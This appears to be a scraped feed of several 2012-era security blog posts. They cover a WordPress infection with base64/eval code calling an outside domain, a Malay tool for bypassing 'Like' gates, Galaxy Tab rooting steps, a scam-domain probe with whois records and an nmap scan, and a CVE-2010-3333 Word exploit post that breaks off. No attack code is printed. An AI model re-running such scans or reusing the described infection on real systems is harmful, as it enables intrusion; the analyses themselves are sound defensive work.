The decoded code above shows that any matched URL from referer will be notify the 'minkof.sellclassics.com' via referer. The script has been set not to run on IE7. The suspicious file that doing this infection is coming from the Wordpress plugins script which is from '/wp-admin/plugins.php'. Let's take a look.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-NB28OxUFN3etCNl7DViQuccxUzxuRV3u6ggvNlMjGx6pDiBmKlYgAWu249Qf4-4daF2FDNfNjPXkmgAsXxSXQMQi6Qezj7bk8qYBZmUVtn7wxUB0clkcsN68hAolcneDDXUCv5yZm0g/s1600/php2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-NB28OxUFN3etCNl7DViQuccxUzxuRV3u6ggvNlMjGx6pDiBmKlYgAWu249Qf4-4daF2FDNfNjPXkmgAsXxSXQMQi6Qezj7bk8qYBZmUVtn7wxUB0clkcsN68hAolcneDDXUCv5yZm0g/s400/php2.png" width="400" /></a></div>
<br />
Well, just what I expected. There is an infection script on the beginning of file and if we take a look at the bottom file there is a huge base64 encoded string with eval(). After decoding a while seems like all the encoded script are the same and randomly put the code within the plugins.php. This cause the plugins.php generate many error.<br />
<br />
Since the infection has been affected on all .php files with the same scripts, I decided to replace all Wordpress file with the new one. After that, there is still left some infected script especially on their custom theme. Need a special script to crawl and find all the infected file. Thanks to @Xanda.org for writing a nice PHP script to detect PHP web shell which is also can be use in this case. After run the script found more than 100 PHP file still got infected. Remove some unused plugins and themes and some have to fix it manually.<br />
<br />
The domain name 'minkof.sellclassics.com' seem already down. I can't go further analysis but there is other guys already analyzed what was happened. As I noticed that is is not only affected on Wordpress but also other popular CMS like Joomla, Drupan and so on.<br />
<br />
http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html<br />
http://productforums.google.com/forum/#!topic/webmasters/SuUGJWwbqeAUnknownnoreply@blogger.com2tag:blogger.com,1999:blog-2797284762054001698.post-80103030647082101512012-05-17T07:11:00.000+08:002012-08-09T11:13:58.970+08:00CyberSecurity Malaysia launch its own DNSChanger detection pageCSM just release another free services for checking DNSChanger trojan existence. By just simply visiting the following website you will be notice whether your current PC/notebook is infected with DNSChanger malware or not.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt0cvQYH-ivbKxqMGuTZcuFNWLJTRpj0nTRfjEXJOvLe8JMQ8eexUArI5j-65SnjzI1Tm3HEoz7n0EtLBPtK8C75XqTjMMA1uOfCLT-AYkChfQmqp9hYpkXjjxdaz8X01B33dE_aKY8vM/s1600/detec1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt0cvQYH-ivbKxqMGuTZcuFNWLJTRpj0nTRfjEXJOvLe8JMQ8eexUArI5j-65SnjzI1Tm3HEoz7n0EtLBPtK8C75XqTjMMA1uOfCLT-AYkChfQmqp9hYpkXjjxdaz8X01B33dE_aKY8vM/s400/detec1.png" width="400" /></a></div>
<br />
<br />
<br />
<a href="http://dnschanger.detect.my/" target="_blank">http://dnschanger.detect.my/</a><br />
<br />
If your PC is clean you will be notice as 'Congratulation!' with green background otherwise you will be detected as red background. They also provided a free removal tools for Mac and Windows users.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-37433153566143839972012-05-03T09:08:00.000+08:002012-08-09T11:14:56.909+08:00Windows 8 Forensics GuideJust reading and share something before I'm going to sleep. It is basic understanding about next generation of Windows called Windows 8. Pretty good for advanced user to known little bit more 'in-depth' how Windows folder, registry, users and system variables, and so on works and located. For malware analyst its probably good to known for future malware infection cases.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzcfY9OS_2V8Yo5jOxx1o_wZM7BgmpDJJf9ySuGtRk51IdbIRuM0Ysx3__VDVUk8YMb-8ToeZxAwEuOWgKHSgUr0C1PFKh2hjRaravDBFZZs9yxuDqKx_1zBHv6NYIfTBeVMm5RppUSpg/s1600/forensic-analysis.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzcfY9OS_2V8Yo5jOxx1o_wZM7BgmpDJJf9ySuGtRk51IdbIRuM0Ysx3__VDVUk8YMb-8ToeZxAwEuOWgKHSgUr0C1PFKh2hjRaravDBFZZs9yxuDqKx_1zBHv6NYIfTBeVMm5RppUSpg/s400/forensic-analysis.jpg" width="400" /></a></div>
<br />
<a href="http://propellerheadforensics.files.wordpress.com/2012/04/thomson_windows-8-forensic-guide.pdf">http://propellerheadforensics.files.wordpress.com/2012/04/thomson_windows-8-forensic-guide.pdf</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-23225681098155890752012-04-13T02:39:00.000+08:002012-08-09T11:41:28.186+08:00Antap v1.0a - Dapatkan Pautan Youtube Anda<center>
</center>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBCQ3KEEbnqIDdRZje-IYQo95KyPPzMLv80kJm7lupyOB1AoaZrMEXXWsPEW4Hi7hVfXpLDTAmBmK9BLjkhJVs2TndqjBo9Do28rrWoHfRBoxxkc3NyKchP5rVT-CDj9lA9CA4vkGO5B8/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBCQ3KEEbnqIDdRZje-IYQo95KyPPzMLv80kJm7lupyOB1AoaZrMEXXWsPEW4Hi7hVfXpLDTAmBmK9BLjkhJVs2TndqjBo9Do28rrWoHfRBoxxkc3NyKchP5rVT-CDj9lA9CA4vkGO5B8/s400/5.png" width="400" /></a></div>
<center>
GAMBAR CONTOH!</center>
<br />
<span style="text-decoration: underline;"><strong>Apakah perisian ini?</strong></span><br />
<br />
Perisian ini diberinama Antap v1.0 (Alpha). Secara asasnya perisian kecil ini akan cuba mendapatkan pautan Youtube dari laman web tertentu yang memerlukan anda klik pautan 'Share' atau 'Like' terlebih dahulu untuk menonton video tersebut.<br />
<br />
<br />
<br />
<span style="text-decoration: underline;"><strong>Kenapa perlunya perisian ini?</strong></span><br />
<br />
Ada sesetengah pengguna mungkin tidak berminat untuk menggunakan perkhidmatan web tertentu yang memerlukan anda menekan butang 'Share' atau 'Like' terlebih dahulu sebelum boleh menonton video kegemaran anda. Teknik sesetengah laman web ini hanya untuk mendapatkan jumlah pelawat yang secara rambang sahaja.<br />
<br />
Secara asasnya, kesemua video tersebut telah di host kan di laman Youtube.com. Kebanyakan laman web 3rd party ini direka untuk mendapatkan jumlah pengguna dari 'Like' atau 'Share' secara rambang oleh pengguna.<br />
<br />
Sesetengah pengguna akan mendapati ianya sangat mengganggu (Annoying). Berikut antara laman web yang digunakan:<br />
<br />
1. www.melayu.tv<br />
2. www.melayutv.info<br />
3. www.melayutv.com<br />
4. www.melayutv.org<br />
5. www.dailymotion.com (By pass Digg Facebook App)<br />
6. www.digg.com (By pass Digg Facebook App)<br />
7. www.zapkolik.com (By pass Zakolik Facebook App)<br />
8. atau pautan yang disalin dari facebook.<br />
<br />
<br />
<br />
<span style="text-decoration: underline;"><strong>Bagaimana cara menggunakannya?</strong></span><br />
<br />
Ikuti langkah mudah berikut:<br />
<br />
1. <a href="http://data0net-tools.googlecode.com/files/Antap.zip" target="_blank" title="Download here!">Muat turun perisian ini</a>. (Perisian ini memerlukan .Net Framework 2.0 untuk digunakan - <a href="http://www.microsoft.com/download/en/details.aspx?id=19" target="_blank" title="Download Microsoft .Net Framework 2.0 here!">Klik sini sekiranya belum ada</a>)<br />
<br />
2. Run terus perisian ini. Lihat imej dibawah.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeEBzOaglzg9lo-NFuMfFTxJ6gvauNpFfp0h-_hbE3oXy-5mkWIRdz0Sz3qknNqcMnO0xKwuTmohy5K-xVT_PjGAB1UtVtDojsoLg-9tNS-Hyf8DKHxrjHyHSqx1xwu1dJqMyzvqNITOg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeEBzOaglzg9lo-NFuMfFTxJ6gvauNpFfp0h-_hbE3oXy-5mkWIRdz0Sz3qknNqcMnO0xKwuTmohy5K-xVT_PjGAB1UtVtDojsoLg-9tNS-Hyf8DKHxrjHyHSqx1xwu1dJqMyzvqNITOg/s400/1.png" width="400" /></a></div>
<br />
<br />
3. Dapatkan URL yang anda ingin menonton video tersebut. Copy dan paste pada program Antap ini. Lihat contoh imej dibawah:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA0s0l0KxfBh95WthMsKBhnWLIfxDIqJ9ck7KVx_HGe98xhIt1PI9RPH4XK5tVqUhRTV8oGnqotk5ixQTdAQ_lj_aBqSLBMH_GIyPDpREb7BxvjnvUfwVfy_WYIoz7HfE8s3Z5ssG2lQI/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA0s0l0KxfBh95WthMsKBhnWLIfxDIqJ9ck7KVx_HGe98xhIt1PI9RPH4XK5tVqUhRTV8oGnqotk5ixQTdAQ_lj_aBqSLBMH_GIyPDpREb7BxvjnvUfwVfy_WYIoz7HfE8s3Z5ssG2lQI/s400/2.png" width="400" /></a></div>
<br />
<br />
ATAU<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi20Ex-8nbtXobk-MezeyXwdN4L1zrOQz7yxv3ZnrS80dHZLIVESKWj0TYS9XCCUOuArjF8CzcD68zs6VrnHdVaPq04OQp31q5SL8lVxxSCWV6K-V9R0yFXC19q-m0mNw7h6jtX6ZU-D6g/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi20Ex-8nbtXobk-MezeyXwdN4L1zrOQz7yxv3ZnrS80dHZLIVESKWj0TYS9XCCUOuArjF8CzcD68zs6VrnHdVaPq04OQp31q5SL8lVxxSCWV6K-V9R0yFXC19q-m0mNw7h6jtX6ZU-D6g/s400/3.png" width="400" /></a></div>
<div style="text-align: center;">
</div>
<br />
4. Kemudian klik butang GO! dan Youtube link akan terpapar.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidgHbtZGqzWOTk55zH3CMKCYXlEJCx5P6EHCaxI9kZFby6Y81znU6rtX-gYCp5QATjtopEoWIK-_KQaamJqQU5Y8V4C8N4s10pc4b3FgRmv01onzATPOinPc6oQUBnXPMagesuSgGSNz0/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidgHbtZGqzWOTk55zH3CMKCYXlEJCx5P6EHCaxI9kZFby6Y81znU6rtX-gYCp5QATjtopEoWIK-_KQaamJqQU5Y8V4C8N4s10pc4b3FgRmv01onzATPOinPc6oQUBnXPMagesuSgGSNz0/s400/4.png" width="400" /></a></div>
<br />
<br />
5. Jadi, hanya perlu klik pada pautan Youtube tu untuk menonton. Selamat mencuba!<br />
<br />
<br />
<br />
<span style="text-decoration: underline;"><strong>Muat Turun</strong></span><br />
<br />
<a href="http://data0net-tools.googlecode.com/files/Antap.zip" target="_blank" title="Download Here la!">Klik disini untuk muat turun</a>.<br />
<br />
<strong>NOTA</strong>: Perisian ini tidak mengandungi apa-apa virus atau kod yang mencurigakan. Anda juga boleh membuat imbasan dari perisian antivirus anda untuk melihatnya sendiri.<br />
<br />
<br />
<br />
<span style="text-decoration: underline;"><strong>Versi Web Boleh diakses disini</strong></span><br />
<br />
<a href="http://www.data0.net/antap.php">http://www.data0.net/antap.php</a>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-2797284762054001698.post-61579368924357925342012-01-04T00:57:00.000+08:002012-08-09T11:35:51.299+08:00Root: Samsung Galaxy Tab 8.9 GT-P7300Just bought a new Samsung Galaxy Tab 8.9 P7300. Well, there's a lot of cool things we can do besides of playing games, social networks, notes, or whatever entertainment. For some of you probably software developer might want more 'fun' with it. But with factory settings nothing much we can do even you can't run a software as simple as phone call apps or access to a little special command on terminal console. So, before we start read the following:<br />
<br />
<span style="color: #ff9900;"><strong>Warning: Please make sure you have a backup copy of your firmware.</strong></span><br />
<span style="color: #ff9900;"><strong>Warning: Please make sure backup all your important data.</strong></span><br />
<span style="color: #ff9900;"><strong>Warning: Your warranty may get void once doing this process.</strong></span><br />
<span style="color: #ff9900;"><strong>Warning: Recommended to install SuperUser app to get prompt permission when launching an apps with root level.</strong></span><br />
<span style="color: #ff9900;"><strong>Warning: I did on Samsung Galaxy Tab 8.9 P7300 + Android 3.1 (Honeycomb) ONLY. Never try yet on other devices.</strong></span><br />
<strong><span style="color: #3366ff;">Disclaimer: The author of this write-up do not take any responsibilities for any damage causes by this action.</span></strong><br />
<br />
<span style="text-decoration: underline;">Follow step by step below:</span><br />
<br />
1. First of all download this file package first. Download here >> <a href="http://data0net-tools.googlecode.com/files/root_2.zip">root_2.zip</a>.<br />
<br />
2. Put the root_2.zip into the root directory (No need to extract).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKKgK_WSpRpfnTJEn93ZA9em9etFVOMcfBhUTfhQo-aIlhS6z8IrVjbVYa_OogR-msTBPFDsyDfy07DBhNYqU8RgbuRLyiNubbWNHy1bl8Fgv9QHGNWggD0iHQOfl0beJwm4JM1EB1OnY/s1600/1n.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKKgK_WSpRpfnTJEn93ZA9em9etFVOMcfBhUTfhQo-aIlhS6z8IrVjbVYa_OogR-msTBPFDsyDfy07DBhNYqU8RgbuRLyiNubbWNHy1bl8Fgv9QHGNWggD0iHQOfl0beJwm4JM1EB1OnY/s400/1n.png" width="400" /></a></div>
<center>
</center>
3. Turn OFF your device.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwQp_NEjeCF9YhzqdfxkxzsezE2geb8QH94aSbYB8TAFb1Ig-vjLW8ZoxcVgT2N9acUjqEQqLaxc3Z2dFY96yveqzJ0Sllx_BnMb1VDsd0ozVFpoFu_98Kf0O-AWHIRDx0wdrWNqEW_YU/s1600/SC20120103-145031b1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwQp_NEjeCF9YhzqdfxkxzsezE2geb8QH94aSbYB8TAFb1Ig-vjLW8ZoxcVgT2N9acUjqEQqLaxc3Z2dFY96yveqzJ0Sllx_BnMb1VDsd0ozVFpoFu_98Kf0O-AWHIRDx0wdrWNqEW_YU/s400/SC20120103-145031b1.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<center>
</center>
4. Then turn ON your device by holding Power and Volume Down button. Repeat this process if you are not successful.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8EzOzJGMVV5f7WKd-ExKsasYOgANc_6bN22MEdbpfxcfNyjd_AfQwSbCF2bfAnaEicQqetgI7SIbkneu_evSpyWw5ImJhaFtCZ5jhDy3kqvo8fSW-fTJ2mLTbfOHQUORVr9QHkBSZik/s1600/020120120262.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8EzOzJGMVV5f7WKd-ExKsasYOgANc_6bN22MEdbpfxcfNyjd_AfQwSbCF2bfAnaEicQqetgI7SIbkneu_evSpyWw5ImJhaFtCZ5jhDy3kqvo8fSW-fTJ2mLTbfOHQUORVr9QHkBSZik/s400/020120120262.jpg" width="400" /></a></div>
<center>
</center>
5. If success, you'll get two icon on the screen which is Recovery and Download Mode. See picture above.<br />
<br />
6. Choose Recovery Mode on your left by pressing Volume Down button then press Volume Up button for confirmation.<br />
<br />
7. Choose 'apply update from /sdcard' by using your volume up/down button. Make sure you choose the 'root_2.zip' on your root storage. Then press Power button to confirm.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC_Fj-c0blu6I4lnb1qXne5QqYZQrI4P1z29CSEimasPr3tztEqyZzxD6bpKdpSCIqPoauBfVddN1I6_GEg_c2BTkL4M52cOj0sweYhysceNsO0_8dmxXHnEw7WqRanl3AVTtmuLvtTPk/s1600/Recovery-Mode.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC_Fj-c0blu6I4lnb1qXne5QqYZQrI4P1z29CSEimasPr3tztEqyZzxD6bpKdpSCIqPoauBfVddN1I6_GEg_c2BTkL4M52cOj0sweYhysceNsO0_8dmxXHnEw7WqRanl3AVTtmuLvtTPk/s400/Recovery-Mode.jpg" width="400" /></a></div>
<center>
</center>
8. You will get 'Install from sdcard complete' message if successful.<br />
<br />
9. Now choose 'reboot system now' to restart your device. Your device should be rooted now.<br />
<br />
10. You can verify whether your device is successful rooted or not by opening Terminal console and type 'su' and ENTER. Then type 'id' and ENTER. You'll see your user id now is 'root' as shown in image below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr9f1l83Zl2OC0KuUoCPOfcaGEbbiLG5qZYYNkR-o0w9TFew2L5g-SLEGdlLXo7AexQsJZ6j6-bQPRqlSYUSYRT8TWHrKLFuyaP1SR4f6sXucbzzqsJ2zWPGRBmr675pPBmnhaCnkcZF8/s1600/SC20120103-155715b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr9f1l83Zl2OC0KuUoCPOfcaGEbbiLG5qZYYNkR-o0w9TFew2L5g-SLEGdlLXo7AexQsJZ6j6-bQPRqlSYUSYRT8TWHrKLFuyaP1SR4f6sXucbzzqsJ2zWPGRBmr675pPBmnhaCnkcZF8/s400/SC20120103-155715b.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<center>
</center>
At this point any software that need a higher access level will be able to install and run as a root privilege. For example VPNC Widget, Samba Filesharing, Superuser and so on. Have a nice day.<br />
<br />
<span style="text-decoration: underline;"><strong>UPDATE (09/01/2012):</strong></span><br />
<br />
Another two devices from a friend of mines which is using Samsung Galaxy Tab 7.0+ and Samsung Galaxy Tab 10.1 seem to be work with those step.Unknownnoreply@blogger.com9tag:blogger.com,1999:blog-2797284762054001698.post-68925622266290298182011-12-31T08:22:00.000+08:002012-08-09T11:43:22.915+08:00Another Chinese Internet Fraudulent (yhoo-it.com)While I was watching 'The Pacific' movie suddenly I just get a Yahoo Messenger popup message from my old friend (which is he's already Rest-In-Peace on Aug 2009 ago). This is interesting and kind of surprise for me while seeing my very close friend suddenly 'wake-up' from his long rest. I was monitoring this scammer about few months ago after surprising his online status. Check this out from the chatting using web browser YM:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwlSgaZ_-pB7MyC_06gPVAL1_ON6-5I2mLtdoeEmq-H_BVrZaV9RMLhMcVLUid2TOYhqU7HTVKAh36Z_s9rORFFLEkJ8gUyOrpouz16_h_h1Z_GC2cpNcqobRfua1JTSQVed453HDT3Sc/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwlSgaZ_-pB7MyC_06gPVAL1_ON6-5I2mLtdoeEmq-H_BVrZaV9RMLhMcVLUid2TOYhqU7HTVKAh36Z_s9rORFFLEkJ8gUyOrpouz16_h_h1Z_GC2cpNcqobRfua1JTSQVed453HDT3Sc/s400/15.png" width="400" /></a></div>
<center>
</center>
<br />
From the given shortened URL it will redirect user to the following URL:<br />
<br />
http://yhoo-it.com/?id=4ccda25f27843014&s=1&user=matkamil2000<br />
<br />
The URL seem to be already expired. But soon it will appeared again. The actual website will appear some kind of offering money that needs user to input their user name and email.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWYUwXUn1J4C8iExnek8yGoyt1B2FbIrMuSGAekzLtI-aoo2d8WQURxkOopdXxcRL6LdQrD5juc82uSiWyzpHmHI6NwcjurZquvnhINCyrA3AeHuj-uL93WcyMiXvaQQZx2tdCyDmC3DM/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWYUwXUn1J4C8iExnek8yGoyt1B2FbIrMuSGAekzLtI-aoo2d8WQURxkOopdXxcRL6LdQrD5juc82uSiWyzpHmHI6NwcjurZquvnhINCyrA3AeHuj-uL93WcyMiXvaQQZx2tdCyDmC3DM/s400/2.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<center>
</center>
Let's take a look closer on the URL. The URL seem to be trying to fool the user that pretend it was coming from Yahoo. Based on whois information the URL was registered from China. Obviously.<br />
<blockquote>
Registration Service Provided By: Bizcn.com<br />
Website: http://www.bizcn.com<br />
Whois Server: whois.bizcn.com<br />
<br />
Domain name: yhoo-it.com<br />
<br />
Registrant Contact:<br />
zhang yu<br />
yu zhang sdfgsdfghf@msn.com<br />
0463965823 fax: 0463965823<br />
changhailu12hao<br />
nanning guangxi 230254<br />
cn<br />
<br />
Administrative Contact:<br />
yu zhang sdfgsdfghf@msn.com<br />
0463965823 fax: 0463965823<br />
changhailu12hao<br />
nanning guangxi 230254<br />
cn<br />
<br />
Technical Contact:<br />
yu zhang sdfgsdfghf@msn.com<br />
0463965823 fax: 0463965823<br />
changhailu12hao<br />
nanning guangxi 230254<br />
cn<br />
<br />
Billing Contact:<br />
yu zhang sdfgsdfghf@msn.com<br />
0463965823 fax: 0463965823<br />
changhailu12hao<br />
nanning guangxi 230254<br />
cn<br />
<br />
DNS:<br />
ns7.cnmsn.net<br />
ns8.cnmsn.net<br />
<br />
Created: 2011-12-04<br />
Expires: 2012-12-04</blockquote>
<br />
The domain name seem to be newly registered and exactly the time I was start monitoring it. The domain has been pointed to two DNS ns7.cnmsn.net and ns8.cnmsn.net. The DNS server were also registered from China.<br />
<blockquote>
Registration Service Provided By: Bizcn.com<br />
Website: http://www.bizcn.com<br />
Whois Server: whois.bizcn.com<br />
<br />
Domain name: cnmsn.net<br />
<br />
Registrant Contact:<br />
XiaMen Longtop Online Technology Co.,Ltd<br />
huiping yi hpyi@longtoponline.com<br />
+865922577888 fax: +865922577111<br />
61, WangHai Road, Longtop Group Building, Xiamen Software Park<br />
xiamen fujian 361008<br />
cn<br />
<br />
Administrative Contact:<br />
huiping yi hpyi@longtoponline.com<br />
+865922577888 fax: +865922577111<br />
61, WangHai Road, Longtop Group Building, Xiamen Software Park<br />
xiamen fujian 361008<br />
cn<br />
<br />
Technical Contact:<br />
huiping yi hpyi@longtoponline.com<br />
+865922577888 fax: +865922577111<br />
61, WangHai Road, Longtop Group Building, Xiamen Software Park<br />
xiamen fujian 361008<br />
cn<br />
<br />
Billing Contact:<br />
huiping yi hpyi@longtoponline.com<br />
+865922577888 fax: +865922577111<br />
61, WangHai Road, Longtop Group Building, Xiamen Software Park<br />
xiamen fujian 361008<br />
cn<br />
<br />
DNS:<br />
dns.bizcn.com<br />
dns.cnmsn.net<br />
ns5.cnmsn.net<br />
ns6.cnmsn.net<br />
ns1.4everdns.com<br />
ns2.4everdns.com<br />
<br />
Created: 2003-08-08<br />
Expires: 2015-02-27</blockquote>
<br />
Well, lets dig some more.<br />
<blockquote>
Nmap scan report for yhoo-it.com (109.230.222.53)<br />
Host is up (0.29s latency).<br />
rDNS record for 109.230.222.53: hosted.by.xsserver.eu<br />
Not shown: 986 closed ports<br />
PORT STATE SERVICE VERSION<br />
25/tcp filtered smtp<br />
80/tcp open http nginx 1.0.4<br />
|_http-title: Site doesn't have a title (text/html).<br />
|_http-methods: No Allow or Public header in OPTIONS response (status code 405)<br />
111/tcp open rpcbind 2 (rpc #100000)<br />
135/tcp filtered msrpc<br />
139/tcp filtered netbios-ssn<br />
443/tcp open ssh OpenSSH 5.5p1 Debian 6 (protocol 2.0)<br />
| ssh-hostkey: 1024 6e:96:96:b1:aa:4b:e2:1a:e5:9f:35:9c:6a:79:af:df (DSA)<br />
|_2048 48:bb:c1:d4:bf:08:4d:c6:41:30:ea:57:3e:eb:fe:19 (RSA)<br />
445/tcp filtered microsoft-ds<br />
593/tcp filtered http-rpc-epmap<br />
1026/tcp filtered LSA-or-nterm<br />
1027/tcp filtered IIS<br />
4444/tcp filtered krb524<br />
5432/tcp open postgresql PostgreSQL DB 8.4.1 - 8.4.4<br />
6129/tcp filtered unknown<br />
6580/tcp open parsec-master?<br />
Device type: general purpose|WAP|router<br />
Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys Linux 2.4.X (92%), Netgear embedded (92%), D-Link embedded (92%), Linksys embedded (92%), Peplink embedded (92%)<br />
, Asus Linux 2.6.X (91%)<br />
Aggressive OS guesses: Linux 2.6.23 - 2.6.33 (95%), Linux 2.6.35 (94%), Linux 2.6.31 (94%), Linux 2.6.32 (94%), Linux 2.6.22 (94%), OpenWrt White Russian 0.9 (Linux 2.4.3<br />
0) (92%), Linux 2.6.18 - 2.6.27 (92%), Linux 2.6.31 - 2.6.34 (92%), Linux 2.6.34 (92%), Netgear DG834G WAP (92%)<br />
No exact OS matches for host (test conditions non-ideal).<br />
Network Distance: 9 hops<br />
Service Info: OS: Linux<br />
<br />
TRACEROUTE (using port 23/tcp)<br />
HOP RTT ADDRESS<br />
1 12.00 ms 60.53.173.202<br />
2 16.00 ms 60.53.173.213<br />
3 16.00 ms 60.53.173.213<br />
4 228.00 ms 10.55.192.38<br />
5 229.00 ms 10gigabitethernet1-3.core1.lax1.he.net (206.223.123.37)<br />
6 290.00 ms 10gigabitethernet4-3.core1.nyc4.he.net (72.52.92.225)<br />
7 333.00 ms 10gigabitethernet1-2.core1.lon1.he.net (72.52.92.242)<br />
8 399.00 ms 10gigabitethernet4-2.core1.fra1.he.net (184.105.213.146)<br />
9 290.00 ms hosted.by.xsserver.eu (109.230.222.53)</blockquote>
<br />
Since I don't trust any source from China even their web hosting provider, I make some Nmap scanning to seem what its got. The web server seem to be running on Unix machine with several web services port opened.<br />
<br />
The Yahoo Messenger online status is coming from the expired phone number which probably has been taken by China scammer that live in Malaysia. Malaysia has multicultural country and it's not impossible that a Chinese from China can disguise as Chinese from Malaysia. Another thing is that probably the YM account has been stolen from his machine via malware infection.<br />
<br />
More updates coming up soon.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2797284762054001698.post-50954216607562153752011-12-06T01:48:00.000+08:002012-08-09T11:49:53.312+08:00MS Word Document (CVE-2010-3333) ExploitA week ago as I checking for the new email and suddenly received an email with MS Word document as an attachment on my inbox (not spam box). This make me curious to know what the heck is that. Lets take a look closer. I rename the MSWord document to 'gigi.doc'. The .doc file size is about 160,192 bytes long.<br />
<br />
The .doc file contain Rich Text Format (RTF) encoding format and we can see a lot of 0x41 slide until we found the exact shellcode within the slide character. Below show you the location of the exploit code in hex format:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7_Iu4PecWP7YQJ5InTGZymjO_1O0XtkwGltGaBCTUZSr-HlcnGCNZEx01GDRl5jT2la76K2lyV5JZfRyQzmH0WLD7WrEcEQsYMiBuHE-exJiGPow8na_LsENTbA0YaBbqU6DdyGG0Lw/s1600/21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="71" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7_Iu4PecWP7YQJ5InTGZymjO_1O0XtkwGltGaBCTUZSr-HlcnGCNZEx01GDRl5jT2la76K2lyV5JZfRyQzmH0WLD7WrEcEQsYMiBuHE-exJiGPow8na_LsENTbA0YaBbqU6DdyGG0Lw/s400/21.png" width="400" /></a></div>
<div style="text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
